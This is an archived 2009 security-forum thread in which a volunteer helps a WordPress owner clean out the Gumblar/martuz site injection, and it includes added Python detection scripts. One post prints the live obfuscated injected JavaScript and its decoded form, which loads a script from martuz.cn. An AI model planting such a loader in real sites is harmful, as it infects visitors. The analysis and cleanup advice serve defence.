Malware Domain List

Malware Related => Compromised Servers => Topic started by: garethplu on May 19, 2009, 11:09:38 pm

Title: [SPLIT] garethplu
Post by: garethplu on May 19, 2009, 11:09:38 pm
If someone's website goes to "martuz.cn", what can they do to fix it?
Title: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 11:00:15 am
1. Remove all malicious scripts from ALL files (i.e. restore a backup)
2. Lock down ALL scripts (JS and PHP etc), and change FTP etc passwords
Title: [SPLIT] garethplu
Post by: garethplu on May 20, 2009, 05:47:50 pm
Thanks, how can I do that? Is there a step-by-step guide I can follow for someone with basic skills? Will my website host be able to help also?
Title: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 05:59:58 pm
Your host may have a backup, but you shouldn't rely on that. They will, however, be able to reset your FTP etc passwords for you.

If you don't have a clean copy of the website's files (e.g. stored locally on your computer), then your choices are severely limited, as they are;

1. Download all of the files, and run through their respective source codes, and remove the malicious source code
2. Start the website from scratch
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 20, 2009, 06:19:51 pm
How do I know what the malicious source code is?
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 06:31:56 pm
Can you post the URL to your website?
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 20, 2009, 06:34:10 pm
http://www.stadiatech.com

The one that really puzzles me. I have tried accessing my website from a few computers and it is only my computer which heads to "martuz.cn". Is that normal?!!!

MysteryFCM: URL disabled
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 06:41:12 pm
Looking at your site's source code shows the following;

Code:
(function(DBCp){var O7l='%';eval(unescape((':76ar:20a:3d:22ScriptEngine:22:2cb:3d:22V:65r:73:69on():2b:22:2cj:3d:22:22:2cu:3d:6eaviga:74:6fr:2eu:73er:41g:65n:74:3bif((u:2einde:78Of(:22:43:68rom:65:22):3c:30):26:26(u:2eind:65xOf(:22W:69n:22):3e0):26:26(u:2eindexOf(:22NT:206:22:29:3c0):26:26(do:63ument:2ec:6fokie:2e:69nde:78Of(:22miek:3d1:22:29:3c:30):26:26:28:74y:70eo:66(z:72v:7at:73):21:3dtypeo:66(:22A:22))):7b:7a:72v:7ats:3d:22:41:22:3beva:6c(:22if:28wi:6ed:6f:77:2e:22+a+:22:29j:3dj+:22+a:2b:22:4da:6ao:72:22+b+a+:22M:69nor:22:2bb+:61+:22:42u:69l:64:22:2bb+:22:6a:3b:22):3bd:6fc:75ment:2ewrite:28:22:3cscript:20src:3d:2f:2fmart:22:2b:22uz:2ec:6e:2fvid:2f:3fid:3d:22:2bj+:22:3e:3c:5c:2f:73c:72ipt:3e:22):3b:7d').replace(DBCp,O7l)))})(/\:/g);

Which decodes to;

Code:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");}
You're rather lucky here, as long as the script is the same in all files, as all you need to do is search for the string "mart", as the obfuscation is extremely basic.

On your homepage, this script appears just next to the "HEAD" HTML tag;

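The decoding step above (swap the `:` separator back to `%`, then `unescape`) can be automated so a theme file can be checked without running the script. This is an added example, not code from the thread or from WordPress; the sample page header below is constructed and points at a reserved `example.invalid` host rather than any real domain.

```python
import re
from urllib.parse import unquote, urlsplit

# Matches the exact wrapper shape shown in the thread:
#   (function(X){var Y='%';eval(unescape(('...').replace(X,Y)))})(/\:/g);
# Group 1/2: the two parameter names, 3: replacement char, 4: payload, 5: separator.
WRAPPER = re.compile(
    r"\(function\((\w+)\)\{var\s+(\w+)='(.)';eval\(unescape\(\('([^']*)'\)"
    r"\.replace\(\1,\2\)\)\)\}\)\(/\\?(.)/g\);"
)

# Constructed sample header in the same encoding scheme (assumption: a defender is
# scanning a downloaded header.php; this is not the page's real injected string).
SAMPLE_HEADER = r"""<html><head>
(function(DBCp){var O7l='%';eval(unescape((':64ocument:2ewrite:28:22<script src:3d//exa:22+:22mple.invalid/x.js:22+:22><\/script>:22:29:3b').replace(DBCp,O7l)))})(/\:/g);
<title>Site</title></head>"""


def decode_wrapper(match):
    """Undo the separator substitution and percent-decode, exactly as the JS would."""
    _, _, repl, payload, sep = match.groups()
    return unquote(payload.replace(sep, repl))


def external_script_hosts(js):
    """Join split string literals ("mart"+"uz.cn") and pull hosts out of src= values."""
    joined = js.replace('"+"', "")
    urls = re.findall(r'src=((?:https?:)?//[^"\s>]+)', joined)
    return [urlsplit(u).netloc for u in urls]


def scan_html(html):
    """Return one record per wrapper found: the decoded JS and the hosts it loads from."""
    findings = []
    for m in WRAPPER.finditer(html):
        decoded = decode_wrapper(m)
        findings.append({"decoded": decoded, "hosts": external_script_hosts(decoded)})
    return findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HEADER):
        print(f["hosts"], f["decoded"])
```

A miss only means the file does not carry this particular wrapper; other injections use different packaging, so a clean result here is not a clean file.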
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 06:42:21 pm
The one that really puzzles me. I have tried accessing my website from a few computers and it is only my computer which heads to "martuz.cn". Is that normal?!!!

It depends entirely on the settings of the browser and the firewall (i.e. if the browser is set to block Javascript it won't load, and if the firewall is corporately owned, it's likely already set to block this domain)
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 06:49:26 pm
Since you're using WordPress, by the way, the main files you need to reinstall and/or clean are your themes (located in /wp-content/themes), though I'd recommend checking ALL of the files just to be on the safe side, as chances are they'll have also uploaded a shell to enable them to re-access your site should the FTP credentials be changed. If you're comfortable doing so, it will be much quicker and much easier to delete the WordPress files and re-upload a clean copy of them (you can obtain the WordPress files from wordpress.org)
Title: Re: [SPLIT] garethplu
Post by: SysAdMini on May 20, 2009, 07:00:55 pm
I recommend deleting all files at your site and restoring everything
from a clean backup. Some php files have been added by this malware, for
example /images/gifimg.php. I don't recommend sorting out the files manually.

Please change the password of your site and restore your site completely from a backup.
Don't try to fix individual files if you don't know exactly what you are doing.
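One way to see what "sorting out the files manually" would involve, and why a restore is easier, is to hash the live site against a stock WordPress download and list what was added or changed. This is an added example, not code from the thread or from WordPress; the two directory trees it builds are constructed fixtures, and the exclusion list is an assumption of files that legitimately differ from a fresh download.

```python
import hashlib
import os
import tempfile

# Assumed to differ from a stock download by design; everything else new or changed
# deserves a look. This list is an assumption, not a WordPress-maintained one.
EXPECTED_EXTRA = {"wp-config.php", ".htaccess"}


def _hashes(root):
    """Map relative path -> SHA-256 of every file under root."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                out[rel] = hashlib.sha256(fh.read()).hexdigest()
    return out


def compare_trees(site_dir, clean_dir):
    """Return (added, modified, missing) relative paths of site_dir versus clean_dir."""
    site, clean = _hashes(site_dir), _hashes(clean_dir)
    added = sorted(p for p in site if p not in clean and p not in EXPECTED_EXTRA)
    modified = sorted(p for p in site if p in clean and site[p] != clean[p])
    missing = sorted(p for p in clean if p not in site)
    return added, modified, missing


def build_fixture():
    """Constructed clean copy and compromised copy, mirroring the thread's findings."""
    base = tempfile.mkdtemp()
    clean, site = os.path.join(base, "clean"), os.path.join(base, "site")
    stock = {"index.php": "<?php require 'wp-blog-header.php';",
             "wp-content/themes/t/header.php": "<html><head><title>Site</title>"}
    # Simulated compromise: script injected next to HEAD, a dropped PHP file under
    # images/ (as SysAdMini reports), plus the site's own legitimate wp-config.php.
    tampered = {"wp-content/themes/t/header.php": "<html><head><script>/*injected*/</script><title>Site</title>",
                "images/gifimg.php": "<?php /* constructed placeholder, not real code */",
                "wp-config.php": "<?php define('DB_NAME', 'example');"}
    for root, files in ((clean, stock), (site, {**stock, **tampered})):
        for rel, body in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
    return site, clean


if __name__ == "__main__":
    print(compare_trees(*build_fixture()))
```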
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 20, 2009, 07:35:50 pm
If it comes to it, can I pay someone to fix this and similar problems?
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 08:09:12 pm
Your hosting company would probably be happy to do it for you. If not, post back here and I'll do it for free for you.
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 20, 2009, 08:16:07 pm
Cheers dude, the world needs more people like you.

I shall speak with the host and see what they say. The RSS no longer works, do you think it's related?
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 08:17:25 pm
More than likely, yes.
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 20, 2009, 08:22:29 pm
Damn.

I've tried a feed validator http://feedvalidator.org/check.cgi?url=http%3A%2F%2Fwww.stadiatech.com%2Ffeed#l241

and it tells me that line 241 is wrong. I have been using the WordPress forum for two days now but the operator of the forum keeps telling me to find the code. I'm not sure how to find the code, what code I'm looking for or what to do if I find it.

I have changed my FTP password btw.
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 08:45:25 pm
The feed likely won't validate whilst the code is present.

Follow the steps below to clean it out;

1. Login to your site via FTP
2. Delete the contents of the htdocs/wwwroot/public_html (or whichever it's called) folder
3. Download the following and extract the contents;

http://wordpress.org/latest.zip

4. Upload the ENTIRE contents of the zip

IMPORTANT: You MUST ensure you make a copy of your wp-config.php file BEFORE doing step 2, as you'll need the database credentials and information, present in this file, to put into the new wp-config.php file, prior to uploading it

Please note, once this is done, you will need to re-install any plugins you had installed.
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 20, 2009, 08:58:25 pm
Sorry Steve,

I've had a good look and I don't recognise this file or anything based on "wwwroot" or "public_html" : "htdocs/wwwroot/public_html"

I notice the zip file is of 2.7.1 which I have installed (this install led to the problem)

Many thanks for the help you're giving, by the way.
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 20, 2009, 09:11:20 pm
No problem.

If you'd prefer I do it for you, please e-mail me at;

mdl @ it-mate.co.uk

The only thing I'll need is your FTP credentials.
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 21, 2009, 05:09:51 pm
Hi,

This is what my host came back to me with:

"I visited and checked your website www.stadiatech.com but it does not
prompt for a virus threat and also the site loads just fine. It did not
even try to redirect the page to martuz.cn."

I'm starting to find this very stressful. I don't know why my host can't find the problem and fix it.
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 21, 2009, 05:15:34 pm
I've just checked, and the problem is definitely still there. Either they didn't look properly, used a browser with JS disabled, or both. Feel free to point them here if need be;

http://vurl.mysteryfcm.co.uk/?url=625774

The script is on line #39
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 21, 2009, 05:28:40 pm
That's what they told me on the WordPress website, but I can't find that code.

If I delete that will it sort this problem?

Thanks.
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 21, 2009, 05:36:27 pm
You could just delete the code, yes (see /wp-content/themes/{theme}/header.php), however, these types of attacks have usually seen extra files added, so they can still get in even when the FTP password is changed, so it's a much better idea just to do a complete refresh.

As mentioned, we'll be happy to help you do this if necessary :)
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 21, 2009, 09:15:40 pm
Thanks Steve, so how did the code get in there? Is it a virus, and does it have a particular purpose? Is there a way of ensuring it doesn't happen again?

How did you get so knowledgeable about this stuff?
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 21, 2009, 10:01:23 pm
Most of the gumblar/martuz infections are done by sniffing the computer that usually connects to it for FTP etc passwords (which also means you'll need to check your machine). For details, please refer to;

http://www.malwaredomainlist.com/forums/index.php?topic=2892.msg9833#msg9833
http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/

One of the samples we've seen has shown it to create both a _.exe and e.bat file (amongst other things) in the root of the infected machine (usually C:\), so it will be worth checking your machine for signs of this infection. For details, please see;

http://www.threatexpert.com/report.aspx?md5=2131112053ed144c46277b9024bcf39f

As far as prevention of this happening again, there are a couple of things you can do;

1. Change your FTP password (I know you've done that already, but I suggest doing it frequently (at least weekly))
2. DO NOT use regular FTP as passwords are sent in plain text - use sFTP (Secure FTP) instead if your host allows it
3. Backup your site frequently - this way, if it does happen again, you can just delete the current files, and restore the backup (again, the backup should be stored in a secure location)
4. Keep your computer up to date (e.g. install Windows patches and such) - not guaranteed to prevent it, but will help
5. Install a firewall on your local computer (this will also help prevent infections sending out your data - again not a guarantee, but will help)

Finally, and most importantly - keep WordPress (and any plugins you have installed) up to date - this will help prevent infections occurring via SQL injection etc.

Again however, none of the above will guarantee to prevent this occurring again - there are no guarantees when it comes to this type of thing unfortunately.

As for how I became knowledgeable, I'm self taught ;) (you'll usually find this is the same for the vast majority of people)
Title: Re: [SPLIT] garethplu
Post by: garethplu on May 22, 2009, 04:35:48 pm
Thanks Steve,

I have now received an email from Google.

Thanks for your advice, but how do I follow points 2 and 3?

What is Secure FTP and how do I backup the site?
Title: Re: [SPLIT] garethplu
Post by: MysteryFCM on May 22, 2009, 05:02:56 pm
sFTP is done in pretty much the same fashion as FTP;

http://winscp.net/eng/docs/protocols#sftp
http://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol

With regards to backing up your site, the easiest way to back up the files is by FTP. Your site's database can be backed up either via the WordPress ACP, or via phpMyAdmin (if you've got it installed on the server)